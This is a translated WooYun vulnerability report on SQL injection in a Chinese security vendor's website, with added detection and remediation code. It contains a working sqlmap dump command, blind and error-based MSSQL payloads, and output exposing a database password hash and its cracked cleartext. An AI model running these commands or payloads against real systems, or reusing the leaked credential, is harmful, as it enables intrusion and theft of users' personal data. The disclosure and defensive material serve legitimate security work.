
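Vulnerability summary

Bug ID: wooyun-2015-0156583

Title: SQL injection on the main site of Shanghai Guangtuo Information Technology Co., Ltd. (上海广拓信息技术有限公司) (DBA privileges, sa password disclosure, and disclosure of users' plaintext passwords, real names and email addresses)

Vendor: Shanghai Guangtuo Information Technology Co., Ltd.

Author: 路人甲

Submitted: 2015-11-30 17:50

Fixed: 2016-01-18 11:24

Published: 2016-01-18 11:24

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org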



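Vulnerability details

Disclosure status:

2015-11-30: Details reported to the vendor; awaiting vendor handling
2015-12-04: Vendor confirmed; details disclosed to the vendor only
2015-12-14: Details disclosed to core white hats and experts in related fields
2015-12-24: Details disclosed to regular white hats
2016-01-03: Details disclosed to intern white hats
2016-01-18: Details disclosed to the public

Brief description:

Shanghai Guangtuo Information Technology Co., Ltd. is a leading Chinese provider of integrated security solutions and has long been committed to using technological progress to create a safe living environment. The company offers advanced products, solutions and professional services in the security field, has provided security services to tens of thousands of enterprises and government bodies, and has customers in 32 provinces, municipalities and regions across the country.
Guangtuo is recognized by the Shanghai municipal government as a high-tech enterprise and a software enterprise. It is a drafting organization for the national standard on pulse electronic fences, the industry standard on tension electronic fences and the industry standard on leaky cables, a vice chair of the China Security Association, and a Class 1 security-qualified enterprise. It holds more than 20 national patents, and several of its software products have been certified by the Shanghai municipal government. Over many years in the security industry Guangtuo has received numerous honors, including Top Ten National Security Brands in China, the Security Expo Innovative Product Excellence Award, recommended excellent security product for "Safe City" projects, Top Ten Burglar Alarm Brands, Top Ten Most Watched Security Enterprises, and largest electronic fence supplier for seven consecutive years.
Guangtuo's focus on R&D and quality has given the company technology that leads the industry and even the world; it has set many industry firsts and continues to drive the industry forward. Its product line is broad: it has released perimeter alarm products with fully independent intellectual property rights, such as pulse electronic fences, tension electronic fences, alarm hosts, leaky cables and vibration fiber optics; video surveillance products such as network HD cameras, analog cameras, DVRs and network storage devices; and a powerful, self-developed security management platform, the SAM100 software.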

Detailed description:

URL: http://**.**.**.**/product/detail.aspx?id=10

$ python sqlmap.py -u "http://**.**.**.**/product/detail.aspx?id=10" -p id --technique=BE --random-agent --batch  -D cwf2035_db_data -T dbo.TB_User -C UserName,PassWord,RealName,Email --dump


current user:    'sa'
current user is DBA: True
database management system users [1]:
[*] sa
database management system users password hashes:
[*] sa [1]:
password hash: 0x01004086ceb6dd95787212f9bc3390591b8caa91859ff2fd1abf
header: 0x0100
salt: 4086ceb6
mixedcase: dd95787212f9bc3390591b8caa91859ff2fd1abf
clear-text password: 1234abcd


Database: cwf2035_db_data
Table: TB_User
[27 entries]

Proof of concept:

---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=10 AND 5772=5772
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=10 AND 2620=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (2620=2620) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113)))
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: cwf2035_db_data
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.TB_Leaveword | 5538 |
| dbo.TB_Case | 847 |
| dbo.V_Case | 847 |
| cwf2035.V_Search | 759 |
| dbo.V_Search | 759 |
| dbo.TB_News | 606 |
| dbo.V_News | 606 |
| dbo.TB_AdminLog | 172 |
| dbo.V_AdminLog | 172 |
| dbo.TB_ProductPic | 164 |
| dbo.TB_Download | 141 |
| dbo.V_Download | 141 |
| dbo.TB_Product | 134 |
| dbo.V_Product | 134 |
| dbo.TB_Article | 94 |
| dbo.V_Article | 94 |
| dbo.TB_Advertising | 87 |
| dbo.TB_Area | 66 |
| dbo.V_Area | 66 |
| dbo.TB_TPermission | 65 |
| dbo.TB_WebTree | 59 |
| dbo.TB_Honor | 57 |
| dbo.TB_StaffPic | 43 |
| dbo.TB_ProductType | 39 |
| dbo.TB_User | 27 |
| dbo.TB_FAQ | 26 |
| dbo.TB_Solu | 19 |
| dbo.V_Solu | 19 |
| dbo.TB_Pager | 15 |
| dbo.V_Pager | 15 |
| dbo.TB_Feedback | 14 |
| dbo.TB_Link | 10 |
| dbo.TB_Role | 7 |
| dbo.TB_Job | 6 |
| dbo.TB_Staff | 5 |
| dbo.TB_Admin | 3 |
| dbo.TB_Discount | 1 |
+--------------------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: cwf2035_db_data
Table: TB_User
[3 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| IsPass | bit |
| PassReset | nvarchar |
| PassWord | nvarchar |
+-----------+----------+
Table: TB_Admin
[2 columns]
+----------+----------+
| Column | Type |
+----------+----------+
| IsPass | bit |
| Password | nvarchar |
+----------+----------+
Database: cwf2035_db_data
Table: TB_User
[13 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| AddTime | datetime |
| Company | nvarchar |
| Email | nvarchar |
| ID | int |
| IsPass | bit |
| Lastlog | datetime |
| Lognum | int |
| PassReset | nvarchar |
| PassWord | nvarchar |
| RealName | nvarchar |
| Sex | int |
| Tel | nvarchar |
| UserName | nvarchar |
+-----------+----------+
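
A detection check for the two request shapes sqlmap reports above for the id parameter, as an added example that is not part of the original report: it reads IIS W3C log lines by their #Fields header and flags non-integer id values, numeric AND/OR comparisons, and the CONVERT(INT,(SELECT ...)) wrapper with CHAR() concatenation. The log excerpt, the documentation-range addresses, the rule names and NUMERIC_PARAMS are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Constructed IIS W3C log excerpt (documentation IP ranges); not taken from the report.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2015-11-30 09:01:12 GET /product/detail.aspx id=10 192.0.2.10 200
2015-11-30 09:01:13 GET /product/detail.aspx id=10%20AND%205772%3D5772 198.51.100.7 200
2015-11-30 09:01:14 GET /product/detail.aspx id=10%20AND%202620%3DCONVERT(INT,(SELECT%20CHAR(113)%2BCHAR(113)%2BCHAR(98)%2BCHAR(118))) 198.51.100.7 500
2015-11-30 09:01:15 GET /product/list.aspx page=2&sort=name 192.0.2.10 200
"""

NUMERIC_PARAMS = {"id"}  # assumption: parameters the application expects to be integers

RULES = {
    "boolean-probe": re.compile(r"\b(?:AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "mssql-error-based": re.compile(r"CONVERT\s*\(\s*INT\s*,\s*\(\s*SELECT", re.I),
    "char-concat": re.compile(r"(?:CHAR\(\d+\)\s*\+\s*){3,}", re.I),
}


def classify(query):
    """Return the sorted rule names that fire for one cs-uri-query value."""
    hits = set()
    # parse_qsl percent-decodes each value, so the rules see the SQL as the server did.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() in NUMERIC_PARAMS and not (value.isascii() and value.isdigit()):
            hits.add("non-integer-id")
        for rule, pattern in RULES.items():
            if pattern.search(value):
                hits.add(rule)
    return sorted(hits)


def scan(log_text):
    """Return (c-ip, cs-uri-stem, sc-status, hits) for every flagged request."""
    fields, findings = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column order is declared by the log itself
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split(" ")))
        query = row.get("cs-uri-query", "-")
        hits = classify(query) if query != "-" else []
        if hits:
            findings.append((row["c-ip"], row["cs-uri-stem"], row["sc-status"], hits))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The non-integer-id rule is the most reliable of the three, because a legitimate request to detail.aspx never carries anything but digits in id.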

Fix:

Add filtering

Copyright notice: when reposting, please credit the source 路人甲@乌云 (WooYun)
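
What filtering means in practice for a numeric id, as an added example that is not the vendor's code: the site in the report runs ASP.NET on SQL Server, so this uses Python's sqlite3 as an offline stand-in with a hypothetical product table. It contrasts a concatenated query, which the report's boolean payload turns into a true/false oracle, with integer validation plus a bound parameter.

```python
import sqlite3

PAGE_PAYLOAD = "10 AND 5772=5772"   # boolean-based payload quoted in the report
FALSE_TWIN = "10 AND 5772=5773"     # constructed counterpart whose condition is false


def make_db():
    """In-memory stand-in for the table behind detail.aspx (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE product (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO product VALUES (?, ?)",
                   [(10, "sample product"), (11, "other product")])
    return db


def detail_vulnerable(db, raw_id):
    """Vulnerable pattern: the raw query-string value becomes part of the SQL text."""
    return db.execute("SELECT name FROM product WHERE id = " + raw_id).fetchall()


def detail_bound_only(db, raw_id):
    """Bound parameter without validation: the whole value is compared as data."""
    return db.execute("SELECT name FROM product WHERE id = ?", (raw_id,)).fetchall()


def parse_id(raw_id):
    """Allow-list validation: ASCII digits only, bounded length."""
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        raise ValueError("id must be a non-negative integer")
    return int(raw_id)


def detail_hardened(db, raw_id):
    """Validate the type first, then bind the integer; never build SQL from input."""
    return db.execute("SELECT name FROM product WHERE id = ?",
                      (parse_id(raw_id),)).fetchall()


def rejects(db, raw_id):
    """True when the hardened handler refuses the value before any SQL runs."""
    try:
        detail_hardened(db, raw_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, true condition :", detail_vulnerable(db, PAGE_PAYLOAD))
    print("vulnerable, false condition:", detail_vulnerable(db, FALSE_TWIN))
    print("bound only                 :", detail_bound_only(db, PAGE_PAYLOAD))
    print("hardened rejects payload   :", rejects(db, PAGE_PAYLOAD))
    print("hardened, legitimate id    :", detail_hardened(db, "10"))
```

Parameterization closes the injection itself; the `current user is DBA: True` finding is separate and calls for a low-privilege database login for the web application instead of sa.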


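Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 9

Confirmed: 2015-12-04 10:59

Vendor reply:

CNVD confirmed and reproduced the reported issue, and has notified the organization that manages the site through the contact details published on the website.

Latest status:

None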